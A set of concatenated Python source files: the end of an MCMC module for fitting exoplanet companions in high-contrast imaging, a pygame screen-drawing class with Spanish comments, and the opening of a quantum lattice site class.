If set to anything else, but None/False/tuple: will compute said mean
and standard deviation automatically.
These values will then be used in the log-probability of the MCMC.
sigma: str, opt
Sets the type of noise to be included as sigma^2 in the log-probability
expression. Choice between 'pho' for photon (Poisson) noise, 'spe' for
residual (mostly whitened) speckle noise, or 'spe+pho' for both.
bounds: numpy.array or list, default=None, optional
The prior knowledge on the model parameters. If None, large bounds will
be automatically estimated from the initial state.
a: float, default=2.0
The proposal scale parameter. See notes.
burnin: float, default=0.3
The fraction of a walker chain which is discarded. NOTE: only used for
Gelman-Rubin convergence test - the chains are returned full.
rhat_threshold: float, default=0.01
The Gelman-Rubin threshold used for the test for nonconvergence.
rhat_count_threshold: int, optional
The Gelman-Rubin test must be satisfied 'rhat_count_threshold' times in
a row before claiming that the chain has converged.
conv_test: str, optional {'gb','ac'}
Method to check for convergence:
- 'gb' for gelman-rubin test
(http://digitalassets.lib.berkeley.edu/sdtr/ucb/text/305.pdf)
- 'ac' for autocorrelation analysis
(https://emcee.readthedocs.io/en/stable/tutorials/autocorr/)
ac_c: float, optional
If the convergence test is made using the auto-correlation, this is the
value of C such that tau/N < 1/C is the condition required for tau to be
considered a reliable auto-correlation time estimate (for N number of
samples). Recommended: C>50.
More details here:
https://emcee.readthedocs.io/en/stable/tutorials/autocorr/
ac_c_thr: int, optional
The auto-correlation test must be satisfied ac_c_thr times in a row
before claiming that the chain has converged.
niteration_min: int, optional
Steps per walker lower bound. The simulation will run at least this
number of steps per walker.
niteration_limit: int, optional
Steps per walker upper bound. If the simulation runs up to
'niteration_limit' steps without having reached the convergence
criterion, the run is stopped.
niteration_supp: int, optional
Number of iterations to run after having "reached the convergence".
check_maxgap: int, optional
Maximum number of steps per walker between two Gelman-Rubin test.
nproc: int, optional
The number of processes to use for parallelization.
output_dir: str, optional
The name of the output directory which contains the output files in the
case ``save`` is True.
output_file: str, optional
The name of the output file which contains the MCMC results in the case
``save`` is True.
display: bool, optional
If True, the walk plot is displayed at each evaluation of the Gelman-
Rubin test.
verbosity: 0, 1, 2 or 3, optional
Verbosity level. 0 for no output and 3 for full information.
(only difference between 2 and 3 is that 3 also writes intermediate
pickles containing the state of the chain at convergence tests; these
can end up taking a lot of space).
save: bool, optional
If True, the MCMC results are pickled.
Returns
-------
out : numpy.array
The MCMC chain.
Notes
-----
The parameter ``a`` must be > 1. For more theoretical information
concerning this parameter, see Goodman & Weare, 2010, Comm. App. Math.
Comp. Sci., 5, 65, Eq. [9] p70.
The parameter 'rhat_threshold' can be a numpy.array with individual
threshold value for each model parameter.
"""
if verbosity >0:
start_time = time_ini()
print(" MCMC sampler for the NEGFC technique ")
print(sep)
# If required, one create the output folder.
if save:
output_file_tmp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
if output_dir[-1] == '/':
output_dir = output_dir[:-1]
try:
os.makedirs(output_dir)
except OSError as exc:
if exc.errno == 17 and os.path.isdir(output_dir):
# errno.EEXIST == 17 -> File exists
pass
else:
raise
if not isinstance(cube, np.ndarray) or cube.ndim != 3:
raise ValueError('`cube` must be a 3D numpy array')
if cube_ref is not None:
if not isinstance(cube_ref, np.ndarray) or cube_ref.ndim != 3:
raise ValueError('`cube_ref` must be a 3D numpy array')
if weights is not None:
if not len(weights)==cube.shape[0]:
raise TypeError("Weights should have same length as cube axis 0")
norm_weights = weights/np.sum(weights)
else:
norm_weights=weights
if psfn.ndim==3:
if psfn.shape[0] != cube.shape[0]:
msg = "If PSF is 3D, number of frames must match cube length"
raise TypeError(msg)
if 'spe' not in sigma and 'pho' not in sigma:
raise ValueError("sigma not recognized")
## set imlib for rotation and shift
if imlib == 'opencv':
imlib_rot = imlib
elif imlib == 'skimage' or imlib == 'ndimage-interp':
imlib_rot = 'skimage'
elif imlib == 'vip-fft' or imlib == 'ndimage-fourier':
imlib_rot = 'vip-fft'
else:
raise TypeError("Interpolation not recognized.")
if nproc is None:
nproc = cpu_count() // 2 # Hyper-threading doubles the # of cores
# #########################################################################
# Initialization of the variables
# #########################################################################
dim = 3 # There are 3 model parameters: rad, theta, flux
itermin = niteration_min
limit = niteration_limit
supp = niteration_supp
maxgap = check_maxgap
initial_state = np.array(initial_state)
mu_sig = get_mu_and_sigma(cube, angs, ncomp, annulus_width,
aperture_radius, fwhm, initial_state[0],
initial_state[1], cube_ref=cube_ref, wedge=wedge,
svd_mode=svd_mode, scaling=scaling, algo=algo,
delta_rot=delta_rot, imlib=imlib_rot,
interpolation=interpolation, collapse=collapse,
weights=norm_weights, algo_options=algo_options)
# Measure mu and sigma once in the annulus (instead of each MCMC step)
if isinstance(mu_sigma, tuple):
if len(mu_sigma) != 2:
raise TypeError("if a tuple, mu_sigma should have 2 elements")
elif mu_sigma:
mu_sigma = mu_sig
if verbosity >0:
msg = "The mean and stddev in the annulus at the radius of the "
msg+= "companion (excluding the PA area directly adjacent to it)"
msg+=" are {:.2f} and {:.2f} respectively."
print(msg.format(mu_sigma[0],mu_sigma[1]))
else:
mu_sigma = mu_sig[0] # just take mean
if itermin > limit:
itermin = 0
fraction = 0.3
geom = 0
lastcheck = 0
konvergence = np.inf
rhat_count = 0
ac_count = 0
chain = np.empty([nwalkers, 1, dim])
nIterations = limit + supp
rhat = np.zeros(dim)
stop = np.inf
if bounds is None:
# angle subtended by aperture_radius/2 or fwhm at r=initial_state[0]
drot = 360/(2*np.pi*initial_state[0]/(aperture_radius*fwhm/2))
bounds = [(initial_state[0] - annulus_width/2.,
initial_state[0] + annulus_width/2.), # radius
(initial_state[1] - drot, initial_state[1] + drot), # angle
(0.1* initial_state[2], 2 * initial_state[2])] # flux
# size of ball of parameters for MCMC initialization
scal = abs(bounds[0][0]-initial_state[0])/initial_state[0]
for i in range(3):
for j in range(2):
test_scal = abs(bounds[i][j]-initial_state[i])/initial_state[i]
if test_scal < scal:
scal= test_scal
pos = initial_state*(1+np.random.normal(0, scal/7., (nwalkers, 3)))
# divided by 7 to not have any walker initialized out of bounds
if verbosity > 0:
print('Beginning emcee Ensemble sampler...')
sampler = emcee.EnsembleSampler(nwalkers, dim, lnprob, a=a,
args=([bounds, cube, angs, plsc, psfn,
fwhm, annulus_width, ncomp,
aperture_radius, initial_state,
cube_ref, svd_mode, scaling, algo,
delta_rot, fmerit, imlib,
interpolation, collapse,
algo_options, weights, transmission,
mu_sigma, sigma]),
threads=nproc)
if verbosity > 0:
print('emcee Ensemble sampler successful')
start = datetime.datetime.now()
# #########################################################################
# Affine Invariant MCMC run
# #########################################################################
if verbosity > 1:
print('\nStart of the MCMC run ...')
print('Step | Duration/step (sec) | Remaining Estimated Time (sec)')
for k, res in enumerate(sampler.sample(pos, iterations=nIterations)):
elapsed = (datetime.datetime.now()-start).total_seconds()
if verbosity > 1:
if k == 0:
q = 0.5
else:
q = 1
print('{}\t\t{:.5f}\t\t\t{:.5f}'.format(k, elapsed * q,
elapsed * (limit-k-1) * q),
flush=True)
start = datetime.datetime.now()
# ---------------------------------------------------------------------
# Store the state manually in order to handle with dynamical sized chain
# ---------------------------------------------------------------------
# Check if the size of the chain is long enough.
s = chain.shape[1]
if k+1 > s: # if not, one doubles the chain length
empty = np.zeros([nwalkers, 2*s, dim])
chain = np.concatenate((chain, empty), axis=1)
# Store the state of the chain
chain[:, k] = res[0]
# ---------------------------------------------------------------------
# If k meets the criterion, one tests the non-convergence.
# ---------------------------------------------------------------------
criterion = int(np.amin([np.ceil(itermin*(1+fraction)**geom),
lastcheck+np.floor(maxgap)]))
if k == criterion:
if verbosity > 1:
print('\n {} convergence test in progress...'.format(conv_test))
geom += 1
lastcheck = k
if display:
show_walk_plot(chain)
if save and verbosity == 3:
fname = '{d}/{f}_temp_k{k}'.format(d=output_dir,f=output_file_tmp, k=k)
data = {'chain': sampler.chain,
'lnprob': sampler.lnprobability,
'AR': sampler.acceptance_fraction}
with open(fname, 'wb') as fileSave:
pickle.dump(data, fileSave)
# We only test the rhat if we have reached the min # of steps
if (k+1) >= itermin and konvergence == np.inf:
if conv_test == 'gb':
thr0 = int(np.floor(burnin*k))
thr1 = int(np.floor((1-burnin)*k*0.25))
# We calculate the rhat for each model parameter.
for j in range(dim):
part1 = chain[:, thr0:thr0 + thr1, j].reshape(-1)
part2 = chain[:, thr0 + 3 * thr1:thr0 + 4 * thr1, j
].reshape(-1)
series = np.vstack((part1, part2))
rhat[j] = gelman_rubin(series)
if verbosity > 0:
print(' r_hat = {}'.format(rhat))
cond = rhat <= rhat_threshold
print(' r_hat <= threshold = {} \n'.format(cond))
# We test the rhat.
if (rhat <= rhat_threshold).all():
rhat_count += 1
if rhat_count < rhat_count_threshold:
if verbosity > 0:
msg = "Gelman-Rubin test OK {}/{}"
print(msg.format(rhat_count, rhat_count_threshold))
elif rhat_count >= rhat_count_threshold:
if verbosity > 0 :
print('... ==> convergence reached')
konvergence = k
stop = konvergence + supp
else:
rhat_count = 0
elif conv_test == 'ac':
# We calculate the auto-corr test for each model parameter.
if save:
write_fits(output_dir+"/TMP_test_chain{:.0f}.fits".format(k),chain[:,:k])
for j in range(dim):
rhat[j] = autocorr_test(chain[:,:k,j])
thr = 1./ac_c
if verbosity > 0:
print('Auto-corr tau/N = {}'.format(rhat))
print('tau/N <= {} = {} \n'.format(thr, rhat<thr))
if (rhat <= thr).all():
ac_count+=1
if verbosity > 0:
msg = "Auto-correlation test passed for all params!"
msg+= "{}/{}".format(ac_count,ac_count_thr)
print(msg)
if ac_count >= ac_count_thr:
msg='\n ... ==> convergence reached'
print(msg)
stop = k
else:
ac_count = 0
else:
raise ValueError('conv_test value not recognized')
# append the autocorrelation factor to file for easy reading
if save:
with open(output_dir + '/MCMC_results_tau.txt', 'a') as f:
f.write(str(rhat) + '\n')
# We have reached the maximum number of steps for our Markov chain.
if k+1 >= stop:
if verbosity > 0:
print('We break the loop because we have reached convergence')
break
if k == nIterations-1:
if verbosity > 0:
print("We have reached the limit # of steps without convergence")
if save:
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
input_parameters = {j: values[j] for j in args[1:]}
output = {'chain': chain_zero_truncated(chain),
'input_parameters': input_parameters,
'AR': sampler.acceptance_fraction,
'lnprobability': sampler.lnprobability}
if output_file is None:
output_file = 'MCMC_results'
with open(output_dir+'/'+output_file, 'wb') as fileSave:
pickle.dump(output, fileSave)
msg = "\nThe file MCMC_results has been stored in the folder {}"
print(msg.format(output_dir+'/'))
if verbosity > 0:
timing(start_time)
return chain_zero_truncated(chain)
def chain_zero_truncated(chain):
"""
Return the Markov chain with the dimension: walkers x steps* x parameters,
where steps* is the last step before having 0 (not yet constructed chain).
Parameters
----------
chain: numpy.array
The MCMC chain.
Returns
-------
out: numpy.array
The truncated MCMC chain, that is to say, the chain which only contains
relevant information.
"""
try:
idxzero = np.where(chain[0, :, 0] == 0.0)[0][0]
except:
idxzero = chain.shape[1]
return chain[:, 0:idxzero, :]
def show_walk_plot(chain, save=False, output_dir='', **kwargs):
"""
Display or save a figure showing the path of each walker during the MCMC run
Parameters
----------
chain: numpy.array
The Markov chain. The shape of chain must be nwalkers x length x dim.
If a part of the chain is filled with zero values, the method will
discard these steps.
save: boolean, default: False
If True, a pdf file is created.
output_dir: str, optional
The name of the output directory which contains the output files in the
case ``save`` is True.
kwargs:
Additional attributes are passed to the matplotlib plot method.
Returns
-------
Display the figure or create a pdf file named walk_plot.pdf in the working
directory.
"""
temp = np.where(chain[0, :, 0] == 0.0)[0]
if len(temp) != 0:
chain = chain[:, :temp[0], :]
labels = kwargs.pop('labels', ["$r$", r"$\theta$", "$f$"])
fig, axes = plt.subplots(3, 1, sharex=True,
figsize=kwargs.pop('figsize', (8, 6)))
axes[2].set_xlabel(kwargs.pop('xlabel', 'step number'))
axes[2].set_xlim(kwargs.pop('xlim', [0, chain.shape[1]]))
color = kwargs.pop('color', 'k')
alpha = kwargs.pop('alpha', 0.4)
for j in range(3):
axes[j].plot(chain[:, :, j].T, color=color, alpha=alpha, **kwargs)
axes[j].yaxis.set_major_locator(MaxNLocator(5))
axes[j].set_ylabel(labels[j])
fig.tight_layout(h_pad=0)
if save:
plt.savefig(output_dir+'walk_plot.pdf')
plt.close(fig)
else:
plt.show()
def show_corner_plot(chain, burnin=0.5, save=False, output_dir='', **kwargs):
"""
Display or save a figure showing the corner plot (pdfs + correlation plots)
Parameters
----------
chain: numpy.array
The Markov chain. The shape of chain must be nwalkers x length x dim.
If a part of the chain is filled with zero values, the method will
discard these steps.
burnin: float, default: 0
The fraction of a walker chain we want to discard.
save: boolean, default: False
If True, a pdf file is created.
output_dir: str, optional
The name of the output directory which contains the output files in the
case ``save`` is True.
kwargs:
Additional attributes are passed to the corner.corner() method.
Returns
-------
Display the figure or create a pdf file named walk_plot.pdf in the working
directory.
Raises
------
ImportError
"""
try:
temp = np.where(chain[0, :, 0] == 0.0)[0]
if len(temp) != 0:
chain = chain[:, :temp[0], :]
length = chain.shape[1]
indburn = int(np.floor(burnin*(length-1)))
chain = chain[:, indburn:length, :].reshape((-1, 3))
except IndexError:
pass
if chain.shape[0] == 0:
print("It seems the chain is empty. Have you already run the MCMC?")
else:
labels = kwargs.pop('labels', ["$r$", r"$\theta$", "$f$"])
fig = corner.corner(chain, labels=labels, **kwargs)
if save:
plt.savefig(output_dir+'corner_plot.pdf')
plt.close(fig)
else:
plt.show()
def confidence(isamples, cfd=68.27, bins=100, gaussian_fit=False, weights=None,
verbose=True, save=False, output_dir='', force=False,
output_file='confidence.txt', title=None, plsc=None, **kwargs):
r"""
Determine the highly probable value for each model parameter, as well as
the 1-sigma confidence interval.
Parameters
----------
isamples: numpy.array
The independent samples for each model parameter.
cfd: float, optional
The confidence level given in percentage.
bins: int, optional
The number of bins used to sample the posterior distributions.
gaussian_fit: boolean, optional
If True, a gaussian fit is performed in order to determine
(:math:`\mu, \sigma`).
weights : (n, ) numpy ndarray or None, optional
An array of weights for each sample.
verbose: boolean, optional
Display information in the shell.
save: boolean, optional
If "True", a txt file with the results is saved in the output
repository.
output_dir: str, optional
If save is True, this is the full path to a directory where the results
are saved.
force: bool, optional
If set to True, force the confidence interval estimate even if too
many samples fall in a single bin (unreliable CI estimates). If False,
an error message is raised if the percentile of samples falling in a
single bin is larger than cfd, suggesting to increase number of bins.
output_file: str, opt
If save is True, name of the text file in which the results are saved.
title: bool or str, opt
If not None, will print labels and parameter values on top of each
plot. If a string, will print that label in front of the parameter
values.
plsc: float, opt
If save is True, this is used to convert pixels to arcsec when writing
results for r.
Returns
-------
out: tuple
A 2 elements tuple with either:
[gaussian_fit=False] a) the highly probable solutions (dictionary),
b) the respective confidence interval (dict.);
[gaussian_fit=True] a) the center of the best-fit 1d Gaussian
distributions (tuple of 3 floats), and
b) their standard deviation, for each parameter
"""
try:
l = isamples.shape[1]
if l == 1:
isamples = isamples[:,0]
pKey = ['f']
label_file = ['flux']
label = [r'$\Delta f$']
elif l == 3:
pKey = ['r', 'theta', 'f']
label_file = ['r', r'$\theta$', 'flux']
label = [r'$r$', r'$\theta$', r'$f$']
else:
raise TypeError("input shape of isamples not recognized")
except:
l = 1
pKey = ['f']
label_file = ['flux']
label = [r'$\Delta f$']
confidenceInterval = {}
val_max = {}
if cfd == 100:
cfd = 99.9
#########################################
## Determine the confidence interval ##
#########################################
if gaussian_fit:
mu = np.zeros(l)
sigma = np.zeros_like(mu)
if gaussian_fit:
fig, ax = plt.subplots(2, l, figsize=(int(l*4),8))
else:
fig, ax = plt.subplots(1, l, figsize=(int(l*4),4))
for j in range(l):
if l>1:
if gaussian_fit:
n, bin_vertices, _ = ax[0][j].hist(isamples[:,j], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
else:
n, bin_vertices, _ = ax[j].hist(isamples[:,j], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
else:
if gaussian_fit:
n, bin_vertices, _ = ax[0].hist(isamples[:], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
else:
n, bin_vertices, _ = ax.hist(isamples[:], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
bins_width = np.mean(np.diff(bin_vertices))
surface_total = np.sum(np.ones_like(n)*bins_width * n)
n_arg_sort = np.argsort(n)[::-1]
test = 0
pourcentage = 0
for k, jj in enumerate(n_arg_sort):
test = test + bins_width*n[int(jj)]
pourcentage = test/surface_total*100
if pourcentage > cfd:
if verbose:
msg = 'percentage for {}: {}%'
print(msg.format(label_file[j], pourcentage))
break
if k ==0:
msg = "WARNING: Percentile reached in a single bin. "
msg += "This may be due to outliers or a small sample."
msg += "Uncertainties will be unreliable. Try one of these:"
msg += "increase bins, or trim outliers, or decrease cfd."
if force:
raise ValueError(msg)
else:
print(msg)
n_arg_min = int(n_arg_sort[:k+1].min())
n_arg_max = int(n_arg_sort[:k+1].max())
if n_arg_min == 0:
n_arg_min += 1
if n_arg_max == bins:
n_arg_max -= 1
val_max[pKey[j]] = bin_vertices[int(n_arg_sort[0])]+bins_width/2.
confidenceInterval[pKey[j]] = np.array([bin_vertices[n_arg_min-1],
bin_vertices[n_arg_max+1]]
- val_max[pKey[j]])
if title is not None:
if isinstance(title, str):
lab = title
else:
lab = pKey[j]
if l>1:
arg = (isamples[:, j] >= bin_vertices[n_arg_min - 1]) * \
(isamples[:, j] <= bin_vertices[n_arg_max + 1])
if gaussian_fit:
ax[0][j].hist(isamples[arg,j], bins=bin_vertices,
facecolor='gray', edgecolor='darkgray',
histtype='stepfilled', alpha=0.5)
ax[0][j].vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax[0][j].set_xlabel(label[j])
if j == 0:
ax[0][j].set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax[0][j].set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
mu[j], sigma[j] = norm.fit(isamples[:, j])
n_fit, bins_fit = np.histogram(isamples[:, j], bins, density=1,
weights=weights)
ax[1][j].hist(isamples[:, j], bins, density=1, weights=weights,
facecolor='gray', edgecolor='darkgray',
histtype='step')
y = norm.pdf(bins_fit, mu[j], sigma[j])
ax[1][j].plot(bins_fit, y, 'r--', linewidth=2, alpha=0.7)
ax[1][j].set_xlabel(label[j])
if j == 0:
ax[1][j].set_ylabel('Counts')
if title is not None:
msg = r"{}: $\mu$ = {:.4f}, $\sigma$ = {:.4f}"
ax[1][j].set_title(msg.format(lab, mu[j], sigma[j]),
fontsize=10)
else:
ax[j].hist(isamples[arg,j], bins=bin_vertices, facecolor='gray',
edgecolor='darkgray', histtype='stepfilled',
alpha=0.5)
ax[j].vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax[j].set_xlabel(label[j])
if j == 0:
ax[j].set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax[1].set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
else:
arg = (isamples[:] >= bin_vertices[n_arg_min - 1]) * \
(isamples[:] <= bin_vertices[n_arg_max + 1])
if gaussian_fit:
ax[0].hist(isamples[arg], bins=bin_vertices,
facecolor='gray', edgecolor='darkgray',
histtype='stepfilled', alpha=0.5)
ax[0].vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax[0].set_xlabel(label[j])
if j == 0:
ax[0].set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax[0].set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
mu[j], sigma[j] = norm.fit(isamples[:])
n_fit, bins_fit = np.histogram(isamples[:], bins, density=1,
weights=weights)
ax[1].hist(isamples[:], bins, density=1, weights=weights,
facecolor='gray', edgecolor='darkgray',
histtype='step')
y = norm.pdf(bins_fit, mu[j], sigma[j])
ax[1].plot(bins_fit, y, 'r--', linewidth=2, alpha=0.7)
ax[1].set_xlabel(label[j])
if j == 0:
ax[1].set_ylabel('Counts')
if title is not None:
msg = r"{}: $\mu$ = {:.4f}, $\sigma$ = {:.4f}"
ax[1].set_title(msg.format(lab, mu[j], sigma[j]),
fontsize=10)
else:
ax.hist(isamples[arg],bins=bin_vertices, facecolor='gray',
edgecolor='darkgray', histtype='stepfilled',
alpha=0.5)
ax.vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax.set_xlabel(label[j])
if j == 0:
ax.set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax.set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
plt.tight_layout(w_pad=0.1)
if save:
if gaussian_fit:
plt.savefig(output_dir+'confi_hist_flux_r_theta_gaussfit.pdf')
else:
plt.savefig(output_dir+'confi_hist_flux_r_theta.pdf')
if verbose:
print('\n\nConfidence intervals:')
if l>1:
print('r: {} [{},{}]'.format(val_max['r'],
confidenceInterval['r'][0],
confidenceInterval['r'][1]))
print('theta: {} [{},{}]'.format(val_max['theta'],
confidenceInterval['theta'][0],
confidenceInterval['theta'][1]))
print('flux: {} [{},{}]'.format(val_max['f'],
confidenceInterval['f'][0],
confidenceInterval['f'][1]))
if gaussian_fit:
print()
print('Gaussian fit results:')
if l>1:
print('r: {} +-{}'.format(mu[0], sigma[0]))
print('theta: {} +-{}'.format(mu[1], sigma[1]))
print('f: {} +-{}'.format(mu[2], sigma[2]))
else:
print('f: {} +-{}'.format(mu[0], sigma[0]))
##############################################
## Write inference results in a text file ##
##############################################
if save:
with open(output_dir+output_file, "w") as f:
f.write('###########################\n')
f.write('#### INFERENCE TEST ###\n')
f.write('###########################\n')
f.write(' \n')
f.write('Results of the MCMC fit\n')
f.write('----------------------- \n')
f.write(' \n')
f.write('>> Position and flux of the planet (highly probable):\n')
f.write('{} % confidence interval\n'.format(cfd))
f.write(' \n')
for i in range(l):
confidenceMax = confidenceInterval[pKey[i]][1]
confidenceMin = -confidenceInterval[pKey[i]][0]
if i == 2 or l==1:
text = '{}: \t\t\t{:.3f} \t-{:.3f} \t+{:.3f}\n'
else:
text = '{}: \t\t\t{:.3f} \t\t-{:.3f} \t\t+{:.3f}\n'
f.write(text.format(pKey[i], val_max[pKey[i]],
confidenceMin, confidenceMax))
if l>1 and plsc is not None:
f.write(' ')
f.write('Platescale = {} mas\n'.format(plsc*1000))
f.write('r (mas): \t\t{:.2f} \t\t-{:.2f} \t\t+{:.2f}\n'.format(
val_max[pKey[0]]*plsc*1000,
-confidenceInterval[pKey[0]][0]*plsc*1000,
confidenceInterval[pKey[0]][1]*plsc*1000))
if gaussian_fit:
return mu, sigma
else:
return val_max, confidenceInterval | vortex-exoplanet/VIP | vip_hci/fm/negfc_mcmc.py | Python | mit | 57,611 |
import pygame
import math
class Screen:
'''
Se encarga de controlar lo que ve el jugador en la pantalla.
Parameters
----------
size : List[int]
Tamaño de la pantalla, ``[w, h]``.
Notes
-----
Primero se debe crear una instancia de este objeto, luego, en cada loop del
juego uno debe (en orden):
- Pintar la pantalla con ``fill()`` para tapar el frame anterior.
- Dibujar todos los sprites con ``draw()``.
- Actualizar la pantalla con ``update()``.
Examples
--------
Acá hay un ejemplo de uso::
# crear la pantalla
screen = toledo.graphics.Screen(screen_size)
...
def loop(): # función ejecutada una vez en cada frame
...
# pintar pantalla de negro para tapar frame anterior
screen.fill(toledo.graphics.Color.from_name("black"))
# dibujar todo lo que haga falta
screen.draw(......)
screen.draw(......)
screen.draw(......)
# por último actualizar pantalla
screen.update()
'''
ANCHOR_TOP_LEFT = 0
'''
int : Anclaje al borde superior izquierdo. Ver función ``draw()``.
'''
ANCHOR_CENTER = 1
'''
int : Anclaje al centro. Ver función ``draw()``.
'''
def __init__(self, size):
self._screen = pygame.display.set_mode(size)
def fill(self, color):
'''
Pintar la pantalla completamente de un color.
Parameters
----------
color : toledo.graphics.Color
Color a usar.
'''
self._screen.fill(color.get_tuple())
def draw(self, sprite, rect, angle=0, smooth=False, anchor=None):
'''
Dibujar un sprite en la pantalla.
No se verán los cambios hasta que se llame a la función
``Screen.update()``.
Parameters
----------
sprite : toledo.graphics.Sprite
Sprite a dibujar.
rect : toledo.Rect
Posición en la pantalla en donde dibujar. Se respeta el tamaño dado.
angle : :obj:`float`, optional
Ángulo de rotación en grados, sentido contrario a las agujas del
reloj.
smooth : :obj:`bool`, optional
Si usar o no antialiasing.
anchor : :obj:`int`, optional
Tipo de anclaje a usar, (por ej. si centrado o esquinado). Usar las
constantes definidas. Ej: ``Screen.ANCHOR_CENTER`` o
``Screen.ANCHOR_TOP_LEFT``.
Por defecto es un anclaje top-left.
Examples
--------
Ejemplo de uso::
screen = toledo.graphics.Screen(screen_size)
...
def loop():
...
screen.draw(sprite_ball, rect_ball, angle=angle_ball,
smooth=True, anchor=screen.ANCHOR_TOP_LEFT)
'''
image = sprite.get_pygame_image()
size = [int(rect.w), int(rect.h)]
angle = angle % 360
if size[0] == 0 or size[1] == 0:
return
pos = self._get_pos(rect, angle, anchor)
# el orden importa
image = self._scale_image(image, size, smooth)
image = self._rotate_image(image, angle, smooth)
self._screen.blit(image, pos)
def update(self):
'''
Actualiza lo que se ve en pantalla.
'''
pygame.display.flip()
def _scale_image(self, image, size, smooth):
'''
Escalar imagen al tamaño dado.
Parameters
----------
image : pygame.Surface
Imagen a escalar.
size : List[int]
Tamaño a escalar, ``[w, h]``.
smooth : bool
Si usar o no antialiasing.
Returns
-------
pygame.Surface
Imagen escalada.
'''
# hacer copia para no modificar la lista original
size = size[:]
if size[0] < 0:
size[0] *= -1
image = pygame.transform.flip(image, True, False)
if size[1] < 0:
size[1] *= -1
image = pygame.transform.flip(image, False, True)
if smooth:
return pygame.transform.smoothscale(image, size)
else:
return pygame.transform.scale(image, size)
def _rotate_image(self, image, angle, smooth):
'''
Rotar imagen al ángulo dado.
Parameters
----------
image : pygame.Surface
Imagen a escalar.
angle : float
Ángulo de rotación en grados, sentido contrario a las agujas del
reloj.
smooth : bool
Si usar o no antialiasing.
Returns
-------
pygame.Surface
Imagen rotada.
'''
if smooth:
return pygame.transform.rotozoom(image, angle, 1)
else:
return pygame.transform.rotate(image, angle)
def _get_pos(self, rect, angle, anchor):
'''
Calcular la posición correcta en donde dibujar la textura. ``pygame``
necesita la posición de la esquina superior izquierda.
Implementa el comportamiento de los anchors.
Parameters
----------
rect : toledo.Rect
Posición y tamaño de la imagen dada por el usuario (no es el tamaño
final luego de la rotación).
angle : float
Ángulo de rotación en grados, sentido contrario a las agujas del
reloj.
anchor : int
Tipo de anclaje a usar.
Returns
-------
List[int]
Posición en la cual hay que dibujar la imagen con ``pygame`` para
que quede en la posición correcta. ``[x, y]``.
'''
pos = [None, None]
angle_rads = math.radians(angle)
# calcular tamaño de la imagen ya rotada, siempre positivo. Puede que
# haya una mejor forma pero funciona
rotated_size = [
abs(abs(rect.w) * math.cos(angle_rads)) +
abs(abs(rect.h) * math.sin(angle_rads)),
abs(abs(rect.h) * math.cos(angle_rads)) +
abs(abs(rect.w) * math.sin(angle_rads))
]
if anchor == None:
anchor = self.ANCHOR_TOP_LEFT
if anchor == self.ANCHOR_CENTER:
pos = [rect.x - rotated_size[0] / 2,
rect.y - rotated_size[1] / 2]
elif anchor == self.ANCHOR_TOP_LEFT:
# corrección para imagenes rotadas. También puede que haya una mejor
# forma
if angle > 0 and angle <= 90:
correction = [
0,
abs(abs(rect.w) * math.sin(angle_rads))
]
elif angle > 90 and angle <= 180:
correction = [
abs(abs(rect.w) * math.cos(angle_rads)),
rotated_size[1]
]
elif angle > 180 and angle <= 270:
correction = [
rotated_size[0],
abs(abs(rect.h) * math.cos(angle_rads)),
]
else:
correction = [
abs(abs(rect.h) * math.sin(angle_rads)),
0
]
# cuando el ancho es negativo, el borde izquierdo pasa a ser el que
# originalmente era el derecho
if rect.w < 0:
pos[0] = rect.x - abs(rect.w)
else:
pos[0] = rect.x - correction[0]
# lo mismo para el borde superior
if rect.h < 0:
pos[1] = rect.y - abs(rect.h)
else:
pos[1] = rect.y - correction[1]
else:
print("ERROR")
return pos
| toboso-team/toledo | toledo/graphics/screen.py | Python | mit | 7,808 |
import numpy as np
class Site(object):
"""A class for general single site
Use this class to create a single site object. The site comes with identity
operator for a given dimension. To build specific site, additional operators
need be add with add_operator method.
"""
def __init__(self, dim):
"""Creates an empty site of dimension dim.
Parameters
----------
dim : an int
Size of the Hilbert space for single site. The dimension must be at
least 1. A site of dim = 1 is trival which represents the vaccum
operators : a dictionary of string and numpy array (with ndim = 2).
Operators for the site.
"""
super(Site, self).__init__()
self.dim = dim
self.states = {}
self.operators = { "id" : np.eye(self.dim, self.dim) }
def add_operator(self, operator_name):
"""Adds an operator to the site with zero matrix.
Parameters
----------
operator_name : string
The operator name.
"""
self.operators[str(operator_name)] = np.zeros((self.dim, self.dim))
def add_state(self, state_name):
"""Adds an state to the site with zero list.
Parameters
----------
operator_name : string
The operator name.
"""
self.states[str(state_name)] = np.zeros(self.dim)
class SpinlessFermionSite(Site):
"""A site for spinless fermion models.
Use this class for spinless fermion sites. The Hilbert space is ordered
such as:
- the first state is empty site
- the second state is occupied site.
Notes
-----
Postcondition : The site has already built-in the operators for
c, c_dag, n.
"""
def __init__(self):
"""Creates the spin one-half site.
Notes
-----
Postcond : the dimension is set to 2
"""
super(SpinlessFermionSite, self).__init__(2)
# add the operators
self.add_operator("c")
self.add_operator("c_dag")
self.add_operator("n")
# for clarity
c = self.operators["c"]
c_dag = self.operators["c_dag"]
n = self.operators["n"]
# set the matrix elements different from zero to the right values
